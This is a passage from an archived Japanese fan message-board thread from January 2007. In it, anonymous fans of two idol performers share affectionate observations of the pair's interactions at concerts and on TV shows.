本日の1部で英雄のときにクレーン二人で乗るんだけど
クレーンが交差するところで上空で二人で微笑みあってた
天井席で良かったとオモタけど、ワロタ。会心の笑顔でした。
新年早々何度も「サト●くん」「サト●さん」「サト●」と3種類聞けたので
満足であります。

160 :ななしじゃにー:2007/01/06(土) 13:41:39 ID:FCEJXob/
5日1恥部ですれちがいざまに軽いハグあり。

後、蛇煮恒例の初詣おもしろエピを、平安にだけ話してあったのに萌えた。
細かいことでスマソ

161 :ななしじゃにー:2007/01/07(日) 11:18:45 ID:+MFXl9e7
トルチンコ、やつぱり傘は自分紹介なのに平安しか見てないのな。
>160
あれって、小僧じゃなかったか?

162 :ななしじゃにー:2007/01/08(月) 22:24:34 ID:Inwgm3YO
昨日だったか、捌ける時に傘が平安に何か言わせようとして
平安がちらっと傘を見て、気になったのか
傘のオバパーに付いた紙吹雪をなにげに取ってあげてた。
モエス。

163 :ななしじゃにー:2007/01/09(火) 08:13:40 ID:IjGN8/m9
髪の毛についてた奴とってたの見たよ。
なんか珍しい光景だったな

昨夜の粗宿もいろいろモエスでした(*´д`)
平安ががっつく傘に対して「喰いたいの?」って笑ってたり
がっつく傘の頭を叩いてたりw←珍しい
ゼリ-のとこ二人の間しか会話と視線が交差してなかったりw
傘を見上げる平安にやられ気味な今日この頃

164 :ななしじゃにー:2007/01/09(火) 13:04:50 ID:W1IY9M62
なんだか平安が親目線でモエス、普段は傘がママンなのにw
平安が叩くようなツッコミするの珍しいよなあ

165 :ななしじゃにー:2007/01/09(火) 14:18:32 ID:RtFSQnOU
バカ食いしてる傘を叩きながらずっと笑ってる平安カワユス。

166 :ななしじゃにー:2007/01/09(火) 14:50:27 ID:U0PSoEb+
>145
サンクス!

ストッキ●グからはみでた傘のホッペを触る平安w

167 :ななしじゃにー:2007/01/09(火) 16:54:38 ID:tad6tdZt
傘が「平安くんが笑ってくれたv」とかいってますます食べないかと心配になったw

168 :ななしじゃにー:2007/01/09(火) 19:15:58 ID:5I6sV4XB
>167
平安は石姫かよv

169 :ななしじゃにー:2007/01/09(火) 21:19:39 ID:8QWMpIcS
傘がマーボー餅食べたあと平安に「ちょっとしょっぱい」って言ったのがw
なんか、とってもツボでした

170 :ななしじゃにー:2007/01/13(土) 00:43:12 ID:Vj421C6D


171 :ななしじゃにー:2007/01/13(土) 17:20:11 ID:cGbLWUfL
しゅ?

172 :ななしじゃにー:2007/01/14(日) 21:27:50 ID:JltjBIU0
こちらに書くべきものでしたかね
本日学校の関係で出演してきたんです
ドームに関西show+紫のやつです
関係者席が近くで二人に出くわしました
昨日はどつよがいましたけど

173 :ななしじゃにー:2007/01/14(日) 22:59:22 ID:86jvwfRt
mjd!?
kwsk!!!!

174 :ななしじゃにー:2007/01/15(月) 08:03:00 ID:1As2YTlX
kwsk・・・?んー。
傘くんは眼鏡姿でした
平安くんはcap姿でした
二人とも皮っぽい黒ジャケにGパンにブーツ姿で
似たような格好で
バルコニ-から見てたんですけど
事務所の方もたくさんいたみたいですね
確か鴇のメンバ-もいた気がします


175 :ななしじゃにー:2007/01/16(火) 01:35:55 ID:YaY6ytEZ
平安がブーツ?うーん?


相変わらず仲良しさん。

176 :ななしじゃにー:2007/01/16(火) 04:51:18 ID:F3ISSNg2
粗宿で平安に向かってキムマヨトーストの感想言う傘が素っぽくてカ●゙エかったなw

177 :ななしじゃにー:2007/01/16(火) 08:45:15 ID:n9h4J3sG
ブーツと見せかけた長靴でない事を祈るw

178 :ななしじゃにー:2007/01/16(火) 09:16:20 ID:2Gc5X9xc
>>176
禿萌え
それ聞いて笑う平安もカ●゙エすぎ

179 :ななしじゃにー:2007/01/16(火) 13:17:45 ID:iqW7bgz/
実験でナツラルに傘が助手なのも
禿萌えでした

180 :ななしじゃにー:2007/01/16(火) 16:49:22 ID:rq87tB2n
>174
dです。
紫兄さんには二人ともお世話になってるからなぁw

>179
sos再び。やはりオヅラさんの前で禿ズラをかぶるのは無理か。

181 :ななしじゃにー:2007/01/16(火) 17:53:17 ID:Tzb1nwG7
粗宿で傘にタメ口注意する平安と
注意される傘萌えw

182 :ななしじゃにー:2007/01/17(水) 01:10:40 ID:y1ZwvC9E
小僧が説明している横で、
二人して口モグモグな図が禿カ●゙エかった

183 :ななしじゃにー:2007/01/17(水) 08:09:19 ID:dVkYIqWd
それより傘食べかけのトーストを
そのまま平安に渡す傘に禿モエスだったな
あんた潔癖だったんじゃ、と一時間w
博士と助手もさることながら
味覚が似てきた山っ子萌え(*´д`)

31 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.04.00 2017/10/04 Walang Kapalit ★
FOX ★ DSO(Dynamic Shared Object)